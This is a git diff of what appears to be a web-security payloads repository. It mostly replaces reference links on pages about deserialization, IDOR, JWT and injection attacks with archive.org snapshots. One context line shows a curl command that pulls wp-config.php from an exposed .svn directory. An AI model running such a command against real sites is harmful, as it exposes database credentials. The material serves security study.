-* [Rusty Joomla RCE Unserialize overflow - Alessandro Groppo - October 3, 2019](https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/)
+* [Rusty Joomla RCE Unserialize overflow - Alessandro Groppo - October 3, 2019](https://web.archive.org/web/20241010013739/https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/)
 * [TSULOTT Web challenge write-up - MeePwn CTF - Rawsec - July 15, 2017](https://web.archive.org/web/20211022151328/https://blog.raw.pm/en/meepwn-2017-write-ups/#TSULOTT-Web)
 * [Utilizing Code Reuse/ROP in PHP - Stefan Esser - June 15, 2020](http://web.archive.org/web/20200615044621/https://owasp.org/www-pdf-archive/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf)
diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md
index e358bcc..79f4940 100644
--- a/Insecure Deserialization/Python.md	
+++ b/Insecure Deserialization/Python.md	
@@ -128,9 +128,9 @@ with open('exploit_unsafeloader.yml') as file:
 
 ## References
 
-* [CVE-2019-20477 - 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - Manmeet Singh (@_j0lt) - June 21, 2020](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
-* [Exploiting misuse of Python's "pickle" - Nelson Elhage - March 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
-* [Python Yaml Deserialization - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization)
-* [PyYAML Documentation - PyYAML - April 29, 2006](https://pyyaml.org/wiki/PyYAMLDocumentation)
-* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
+* [CVE-2019-20477 - 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - Manmeet Singh (@_j0lt) - June 21, 2020](https://web.archive.org/web/20250501184227/https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
+* [Exploiting misuse of Python's "pickle" - Nelson Elhage - March 20, 2011](https://web.archive.org/web/20260211161939/https://blog.nelhage.com/2011/03/exploiting-pickle/)
+* [Python Yaml Deserialization - HackTricks - July 19, 2024](https://web.archive.org/web/20241216145404/https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization)
+* [PyYAML Documentation - PyYAML - April 29, 2006](https://web.archive.org/web/20260219140302/https://pyyaml.org/wiki/PyYAMLDocumentation)
+* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021](https://web.archive.org/web/20250604032318/https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
 * [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md
index ab177cc..0a144b7 100644
--- a/Insecure Deserialization/README.md	
+++ b/Insecure Deserialization/README.md	
@@ -55,6 +55,6 @@ POP gadgets characteristics:
 
 ## References
 
-* [ExploitDB Introduction - Abdelazim Mohammed(@intx0x80) - May 27, 2018](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf)
-* [Exploiting insecure deserialization vulnerabilities - PortSwigger - July 25, 2020](https://portswigger.net/web-security/deserialization/exploiting)
-* [Instagram's Million Dollar Bug - Wesley Wineberg - December 17, 2015](http://www.exfiltrated.com/research-Instagram-RCE.php)
+* [ExploitDB Introduction - Abdelazim Mohammed(@intx0x80) - May 27, 2018](https://web.archive.org/web/20180527082635/https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf)
+* [Exploiting insecure deserialization vulnerabilities - PortSwigger - July 25, 2020](https://web.archive.org/web/20200725143552/https://portswigger.net/web-security/deserialization/exploiting)
+* [Instagram's Million Dollar Bug - Wesley Wineberg - December 17, 2015](https://web.archive.org/web/20151217194413/http://exfiltrated.com/research-Instagram-RCE.php)
diff --git a/Insecure Deserialization/Ruby.md b/Insecure Deserialization/Ruby.md
index d902936..83cf554 100644
--- a/Insecure Deserialization/Ruby.md	
+++ b/Insecure Deserialization/Ruby.md	
@@ -87,8 +87,8 @@ Universal gadget for ruby 2.x - 3.x.
 
 ## References
 
-* [Ruby 2.X Universal RCE Deserialization Gadget Chain - Luke Jahnke - November 8, 2018](https://www.elttam.com.au/blog/ruby-deserialization/)
-* [Universal RCE with Ruby YAML.load - Etienne Stalmans (@_staaldraad) - March 2, 2019](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
-* [Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab - 2024](https://pentesterlab.com/exercises/ruby_ugadget/course)
-* [Universal RCE with Ruby YAML.load (versions > 2.7) - Etienne Stalmans (@_staaldraad) - January 9, 2021](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
-* [Blind Remote Code Execution through YAML Deserialization - Colin McQueen - June 9, 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
+* [Ruby 2.X Universal RCE Deserialization Gadget Chain - Luke Jahnke - November 8, 2018](https://web.archive.org/web/20191128020715/https://www.elttam.com.au/blog/ruby-deserialization/)
+* [Universal RCE with Ruby YAML.load - Etienne Stalmans (@_staaldraad) - March 2, 2019](https://web.archive.org/web/20190302114631/https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
+* [Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab - 2024](https://web.archive.org/web/20190817140453/https://pentesterlab.com/exercises/ruby_ugadget/course)
+* [Universal RCE with Ruby YAML.load (versions > 2.7) - Etienne Stalmans (@_staaldraad) - January 9, 2021](https://web.archive.org/web/20260201150417/https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
+* [Blind Remote Code Execution through YAML Deserialization - Colin McQueen - June 9, 2021](https://web.archive.org/web/20210610111705/https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
diff --git a/Insecure Direct Object References/README.md b/Insecure Direct Object References/README.md
index 17504fb..7c0295a 100644
--- a/Insecure Direct Object References/README.md	
+++ b/Insecure Direct Object References/README.md	
@@ -118,12 +118,12 @@ Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID, some backend might respon
 ## References
 
 * [From Christmas present in the blockchain to massive bug bounty - Jesse Lakerveld - March 21, 2018](http://web.archive.org/web/20180401130129/https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
-* [How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton - November 9, 2017](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
-* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - February 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
-* [IDOR - how to predict an identifier? Bug bounty case study - Bug Bounty Reports Explained - September 21, 2023](https://youtu.be/wx5TwS0Dres)
-* [Insecure Direct Object Reference Prevention Cheat Sheet - OWASP - July 31, 2023](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
-* [Insecure direct object references (IDOR) - PortSwigger - December 25, 2019](https://portswigger.net/web-security/access-control/idor)
-* [Testing for IDORs - PortSwigger - October 29, 2024](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors)
-* [Testing for Insecure Direct Object References (OTG-AUTHZ-004) - OWASP - August 8, 2014](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
-* [The Rise of IDOR - HackerOne - April 2, 2021](https://www.hackerone.com/company-news/rise-idor)
-* [Web to App Phone Notification IDOR to view Everyone's Airbnb Messages - Brett Buerhaus - March 31, 2017](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/)
+* [How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton - November 9, 2017](https://web.archive.org/web/20260221194813/https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
+* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - February 2, 2018](https://web.archive.org/web/20190509043727/https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
+* [IDOR - how to predict an identifier? Bug bounty case study - Bug Bounty Reports Explained - September 21, 2023](https://web.archive.org/web/20231027235449/https://youtu.be/wx5TwS0Dres)
+* [Insecure Direct Object Reference Prevention Cheat Sheet - OWASP - July 31, 2023](https://web.archive.org/web/20140316052400/https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
+* [Insecure direct object references (IDOR) - PortSwigger - December 25, 2019](https://web.archive.org/web/20260301072233/https://portswigger.net/web-security/access-control/idor)
+* [Testing for IDORs - PortSwigger - October 29, 2024](https://web.archive.org/web/20230604162333/https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors)
+* [Testing for Insecure Direct Object References (OTG-AUTHZ-004) - OWASP - August 8, 2014](https://web.archive.org/web/20170712205114/https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
+* [The Rise of IDOR - HackerOne - April 2, 2021](https://web.archive.org/web/20211004153030/https://www.hackerone.com/company-news/rise-idor)
+* [Web to App Phone Notification IDOR to view Everyone's Airbnb Messages - Brett Buerhaus - March 31, 2017](https://web.archive.org/web/20170408053950/http://buer.haus:80/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages)
diff --git a/Insecure Management Interface/README.md b/Insecure Management Interface/README.md
index aa2e8da..6312a6a 100644
--- a/Insecure Management Interface/README.md	
+++ b/Insecure Management Interface/README.md	
@@ -37,6 +37,6 @@ Insecure Management Interface vulnerabilities arise when administrative interfac
 
 ## References
 
-* [CAPEC-121: Exploit Non-Production Interfaces - CAPEC - July 30, 2020](https://capec.mitre.org/data/definitions/121.html)
-* [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
-* [Springboot - Official Documentation - May 9, 2024](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
+* [CAPEC-121: Exploit Non-Production Interfaces - CAPEC - July 30, 2020](https://web.archive.org/web/20260116113320/https://capec.mitre.org/data/definitions/121.html)
+* [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://web.archive.org/web/20250116045001/https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
+* [Springboot - Official Documentation - May 9, 2024](https://web.archive.org/web/20140725032126/http://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
diff --git a/Insecure Randomness/README.md b/Insecure Randomness/README.md
index ea74381..d30261d 100644
--- a/Insecure Randomness/README.md	
+++ b/Insecure Randomness/README.md	
@@ -199,11 +199,11 @@ Generic identification and sandwich attack:
 
 ## References
 
-* [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - January 6, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction)
+* [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - January 6, 2020](https://web.archive.org/web/20200106202157/https://www.ambionics.io/blog/php-mt-rand-prediction)
 * [Cracking Time-Based Tokens: A Glimpse from a Workshop During leHACK 2025-Singularity - 4m1d0n - June 30, 2025](https://4m1d0n.github.io/retex-insecure-time-token-sandwich-attack/)
-* [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - October 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01)
-* [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
-* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
-* [Multi-sandwich attack with MongoDB Object ID or the scenario for real-time monitoring of web application invitations: a new use case for the sandwich attack - Tom CHAMBARETAUD (@AethliosIK) - July 18, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/multi-sandwich-article-en.html)
-* [Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html) *(FR)*
-* [Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html) *(EN)*
+* [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - October 18, 2023](https://web.archive.org/web/20250919151004/https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01)
+* [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://web.archive.org/web/20200826103440/https://techkranti.com/idor-through-mongodb-object-ids-prediction)
+* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://web.archive.org/web/20221013100900/https://www.intruder.io/research/in-guid-we-trust)
+* [Multi-sandwich attack with MongoDB Object ID or the scenario for real-time monitoring of web application invitations: a new use case for the sandwich attack - Tom CHAMBARETAUD (@AethliosIK) - July 18, 2024](https://web.archive.org/web/20260201082729/https://www.aeth.cc/public/Article-Reset-Tolkien/multi-sandwich-article-en.html)
+* [Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://web.archive.org/web/20240408172738/https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html) *(FR)*
+* [Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://web.archive.org/web/20250531084109/https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html) *(EN)*
diff --git a/Insecure Source Code Management/Bazaar.md b/Insecure Source Code Management/Bazaar.md
index a219747..4546033 100644
--- a/Insecure Source Code Management/Bazaar.md	
+++ b/Insecure Source Code Management/Bazaar.md	
@@ -49,4 +49,4 @@ bzr revert
 
 ## References
 
-* [STEM CTF Cyber Challenge 2019 – My First Blog - m3ssap0 / zuzzur3ll0n1 - March 2, 2019](https://ctftime.org/writeup/13380)
+* [STEM CTF Cyber Challenge 2019 – My First Blog - m3ssap0 / zuzzur3ll0n1 - March 2, 2019](https://web.archive.org/web/20200926122213/https://ctftime.org/writeup/13380)
diff --git a/Insecure Source Code Management/Git.md b/Insecure Source Code Management/Git.md
index 180cc61..ae27395 100644
--- a/Insecure Source Code Management/Git.md	
+++ b/Insecure Source Code Management/Git.md	
@@ -246,4 +246,4 @@ gitrob [options] target [target2] ... [targetN]
 
 ## References
 
-* [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/)
+* [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://web.archive.org/web/20240930092732/https://michenriksen.com/blog/gitrob-now-in-go/)
diff --git a/Insecure Source Code Management/Mercurial.md b/Insecure Source Code Management/Mercurial.md
index a2c6d1b..c4cda0c 100644
--- a/Insecure Source Code Management/Mercurial.md	
+++ b/Insecure Source Code Management/Mercurial.md	
@@ -20,4 +20,4 @@
 
 ## References
 
-* [my-chemical-romance - siunam - Feb 13, 2023](https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/)
+* [my-chemical-romance - siunam - Feb 13, 2023](https://web.archive.org/web/20250712102012/https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/)
diff --git a/Insecure Source Code Management/Subversion.md b/Insecure Source Code Management/Subversion.md
index 85b2f54..1be792f 100644
--- a/Insecure Source Code Management/Subversion.md	
+++ b/Insecure Source Code Management/Subversion.md	
@@ -36,4 +36,4 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
 
 ## References
 
-* [SVN Extractor for Web Pentesters - Anant Shrivastava - March 26, 2013](http://blog.anantshri.info/svn-extractor-for-web-pentesters/)
+* [SVN Extractor for Web Pentesters - Anant Shrivastava - March 26, 2013](https://web.archive.org/web/20130329022536/http://blog.anantshri.info:80/svn-extractor-for-web-pentesters)
diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md
index 36114e6..9d228ac 100644
--- a/JSON Web Token/README.md	
+++ b/JSON Web Token/README.md	
@@ -522,20 +522,20 @@ You should create your own key pair for this attack and host it. It should look
 
 ## References
 
-- [5 Easy Steps to Understanding JSON Web Token - Shaurya Sharma - December 21, 2019](https://medium.com/cyberverse/five-easy-steps-to-understand-json-web-tokens-jwt-7665d2ddf4d5)
-- [Attacking JWT authentication - Sjoerd Langkemper - September 28, 2016](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
-- [Club EH RM 05 - Intro to JSON Web Token Exploitation - Nishacid - February 23, 2023](https://www.youtube.com/watch?v=d7wmUz57Nlg)
-- [Critical vulnerabilities in JSON Web Token libraries - Tim McLean - March 31, 2015](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)
-- [Hacking JSON Web Token (JWT) - pwnzzzz - May 3, 2018](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
+- [5 Easy Steps to Understanding JSON Web Token - Shaurya Sharma - December 21, 2019](https://web.archive.org/web/20210218162416/https://medium.com/cyberverse/five-easy-steps-to-understand-json-web-tokens-jwt-7665d2ddf4d5)
+- [Attacking JWT authentication - Sjoerd Langkemper - September 28, 2016](https://web.archive.org/web/20251102094325/https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
+- [Club EH RM 05 - Intro to JSON Web Token Exploitation - Nishacid - February 23, 2023](https://web.archive.org/web/20250914204544/https://www.youtube.com/watch?v=d7wmUz57Nlg)
+- [Critical vulnerabilities in JSON Web Token libraries - Tim McLean - March 31, 2015](https://web.archive.org/web/20260207024257/https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/)
+- [Hacking JSON Web Token (JWT) - pwnzzzz - May 3, 2018](https://web.archive.org/web/20180509012007/https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
 - [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify - February 9, 2017](https://web.archive.org/web/20220305042224/https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
-- [Hacking JSON Web Tokens - Vickie Li - October 27, 2019](https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a)
-- [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng) - August 27, 2017](https://nandynarwhals.org/hitbgsec2017-pasty/)
-- [How to Hack a Weak JWT Implementation with a Timing Attack - Tamas Polgar - January 7, 2017](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
-- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass)
-- [JSON Web Token Vulnerabilities - 0xn3va - March 27, 2022](https://0xn3va.gitbook.io/cheat-sheets/web-application/json-web-token-vulnerabilities)
-- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8, 2017](https://trustfoundry.net/jwt-hacking-101/)
+- [Hacking JSON Web Tokens - Vickie Li - October 27, 2019](https://web.archive.org/web/20191028125424/https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a)
+- [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng) - August 27, 2017](https://web.archive.org/web/20240229055017/https://nandynarwhals.org/hitbgsec2017-pasty/)
+- [How to Hack a Weak JWT Implementation with a Timing Attack - Tamas Polgar - January 7, 2017](https://web.archive.org/web/20190331200826/https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
+- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight - April 16, 2020](https://web.archive.org/web/20230104231143/https://insomniasec.com/blog/auth0-jwt-validation-bypass)
+- [JSON Web Token Vulnerabilities - 0xn3va - March 27, 2022](https://web.archive.org/web/20260305090633/https://0xn3va.gitbook.io/cheat-sheets/web-application/json-web-token-vulnerabilities)
+- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8, 2017](https://web.archive.org/web/20190405023824/https://trustfoundry.net/jwt-hacking-101/)
 - [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq - May 3, 2022](https://github.com/dwyl/learn-json-web-tokens)
-- [Privilege Escalation like a Boss - janijay007 - October 27, 2018](https://blog.securitybreached.org/2018/10/27/privilege-escalation-like-a-boss/)
-- [Simple JWT hacking - Hari Prasanth (@b1ack_h00d) - March 7, 2019](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
-- [WebSec CTF - Authorization Token - JWT Challenge - Kris Hunt - August 7, 2016](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
+- [Privilege Escalation like a Boss - janijay007 - October 27, 2018](https://web.archive.org/web/20190723093831/https://blog.securitybreached.org/2018/10/27/privilege-escalation-like-a-boss/)
+- [Simple JWT hacking - Hari Prasanth (@b1ack_h00d) - March 7, 2019](https://web.archive.org/web/20200724145838/https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
+- [WebSec CTF - Authorization Token - JWT Challenge - Kris Hunt - August 7, 2016](https://web.archive.org/web/20211025223311/https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
 - [Write up – JRR Token – LeHack 2019 - Laphaze - July 7, 2019](https://web.archive.org/web/20210512205928/https://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
diff --git a/Java RMI/README.md b/Java RMI/README.md
index 94ff35d..116c312 100644
--- a/Java RMI/README.md	
+++ b/Java RMI/README.md	
@@ -140,6 +140,6 @@ run
 
 ## References
 
-* [Attacking RMI based JMX services - Hans-Martin Münch - April 28, 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
-* [JMX RMI - MULTIPLE APPLICATIONS RCE - Red Timmy Security - March 26, 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf)
-* [remote-method-guesser - BHUSA 2021 Arsenal - Tobias Neitzel - August 15, 2021](https://www.slideshare.net/TobiasNeitzel/remotemethodguesser-bhusa2021-arsenal)
+* [Attacking RMI based JMX services - Hans-Martin Münch - April 28, 2019](https://web.archive.org/web/20201024121233/https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
+* [JMX RMI - MULTIPLE APPLICATIONS RCE - Red Timmy Security - March 26, 2019](https://web.archive.org/web/20250523025328/https://www.exploit-db.com/docs/english/46607-jmx-rmi-%E2%80%93-multiple-applications-remote-code-execution.pdf)
+* [remote-method-guesser - BHUSA 2021 Arsenal - Tobias Neitzel - August 15, 2021](https://web.archive.org/web/20210817144943/https://www.slideshare.net/TobiasNeitzel/remotemethodguesser-bhusa2021-arsenal)
diff --git a/LDAP Injection/README.md b/LDAP Injection/README.md
index 73000ef..acf31d1 100644
--- a/LDAP Injection/README.md	
+++ b/LDAP Injection/README.md	
@@ -166,9 +166,9 @@ end
 ## References
 
 * [[European Cyber Week] - AdmYSion - Alan Marrec (Maki)](https://www.maki.bzh/writeups/ecw2018admyssion/)
-* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN - October 31, 2018](https://0xukn.fr/posts/writeupecw2018admyssion/)
-* [How To Configure OpenLDAP and Perform Administrative LDAP Tasks - Justin Ellingwood - May 30, 2015](https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks)
-* [How To Manage and Use LDAP Servers with OpenLDAP Utilities - Justin Ellingwood - May 29, 2015](https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities)
-* [LDAP Blind Explorer - Alonso Parada - August 12, 2011](http://code.google.com/p/ldap-blind-explorer/)
-* [LDAP Injection & Blind LDAP Injection - Chema Alonso, José Parada Gimeno - October 10, 2008](https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf)
-* [LDAP Injection Prevention Cheat Sheet - OWASP - July 16, 2019](https://www.owasp.org/index.php/LDAP_injection)
+* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN - October 31, 2018](https://web.archive.org/web/20200924103615/https://0xukn.fr/posts/writeupecw2018admyssion/)
+* [How To Configure OpenLDAP and Perform Administrative LDAP Tasks - Justin Ellingwood - May 30, 2015](https://web.archive.org/web/20260119175101/https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks)
+* [How To Manage and Use LDAP Servers with OpenLDAP Utilities - Justin Ellingwood - May 29, 2015](https://web.archive.org/web/20160305121823/https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities)
+* [LDAP Blind Explorer - Alonso Parada - August 12, 2011](https://web.archive.org/web/20160120073444/https://code.google.com/p/ldap-blind-explorer/)
+* [LDAP Injection & Blind LDAP Injection - Chema Alonso, José Parada Gimeno - October 10, 2008](https://web.archive.org/web/20081010181534/http://blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf)
+* [LDAP Injection Prevention Cheat Sheet - OWASP - July 16, 2019](https://web.archive.org/web/20190719164052/https://www.owasp.org/index.php/LDAP_injection)
diff --git a/LaTeX Injection/README.md b/LaTeX Injection/README.md
index 3a7bc6b..b0e34b3 100644
--- a/LaTeX Injection/README.md	
+++ b/LaTeX Injection/README.md	
@@ -132,6 +132,6 @@ In [mathjax](https://docs.mathjax.org/en/latest/input/tex/extensions/unicode.htm
 
 ## References
 
-* [Hacking with LaTeX - Sebastian Neef - March 10, 2016](https://0day.work/hacking-with-latex/)
-* [Latex to RCE, Private Bug Bounty Program - Yasho - July 6, 2018](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
-* [Pwning coworkers thanks to LaTeX - scumjr - November 28, 2016](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
+* [Hacking with LaTeX - Sebastian Neef - March 10, 2016](https://web.archive.org/web/20260209043241/https://0day.work/hacking-with-latex/)
+* [Latex to RCE, Private Bug Bounty Program - Yasho - July 6, 2018](https://web.archive.org/web/20210117203905/https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
+* [Pwning coworkers thanks to LaTeX - scumjr - November 28, 2016](https://web.archive.org/web/20161130151956/https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
diff --git a/Mass Assignment/README.md b/Mass Assignment/README.md
index 64b0357..b5918b6 100644
--- a/Mass Assignment/README.md	
+++ b/Mass Assignment/README.md	
@@ -36,5 +36,5 @@ If the web application is not checking which parameters are allowed to be update
 ## References
 
 * [Hunting for Mass Assignment - Shivam Bathla - August 12, 2021](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)
-* [Mass Assignment Cheat Sheet - OWASP - March 15, 2021](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)
+* [Mass Assignment Cheat Sheet - OWASP - March 15, 2021](https://web.archive.org/web/20260216020815/https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)
 * [What is Mass Assignment? Attacks and Security Tips - Yoan MONTOYA - June 15, 2023](https://www.vaadata.com/blog/what-is-mass-assignment-attacks-and-security-tips/)
diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md
index bb2c191..5a26c31 100644
--- a/NoSQL Injection/README.md	
+++ b/NoSQL Injection/README.md	
@@ -238,10 +238,10 @@ end
 ## References
 
 * [Burp-NoSQLiScanner - matrix - January 30, 2021](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)
-* [Getting rid of pre- and post-conditions in NoSQL injections - Reino Mostert - March 11, 2025](https://sensepost.com/blog/2025/getting-rid-of-pre-and-post-conditions-in-nosql-injections/)
-* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat - February 22, 2015](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
-* [MongoDB NoSQL Injection with Aggregation Pipelines - Soroush Dalili (@irsdl) - June 23, 2024](https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/)
-* [NoSQL error-based injection - Reino Mostert - March 15, 2025](https://sensepost.com/blog/2025/nosql-error-based-injection/)
-* [NoSQL Injection in MongoDB - Zanon - July 17, 2016](https://zanon.io/posts/nosql-injection-in-mongodb)
+* [Getting rid of pre- and post-conditions in NoSQL injections - Reino Mostert - March 11, 2025](https://web.archive.org/web/20260208131430/https://sensepost.com/blog/2025/getting-rid-of-pre-and-post-conditions-in-nosql-injections/)
+* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat - February 22, 2015](https://web.archive.org/web/20160316144254/http://www.dailysecurity.fr/nosql-injections-classique-blind/)
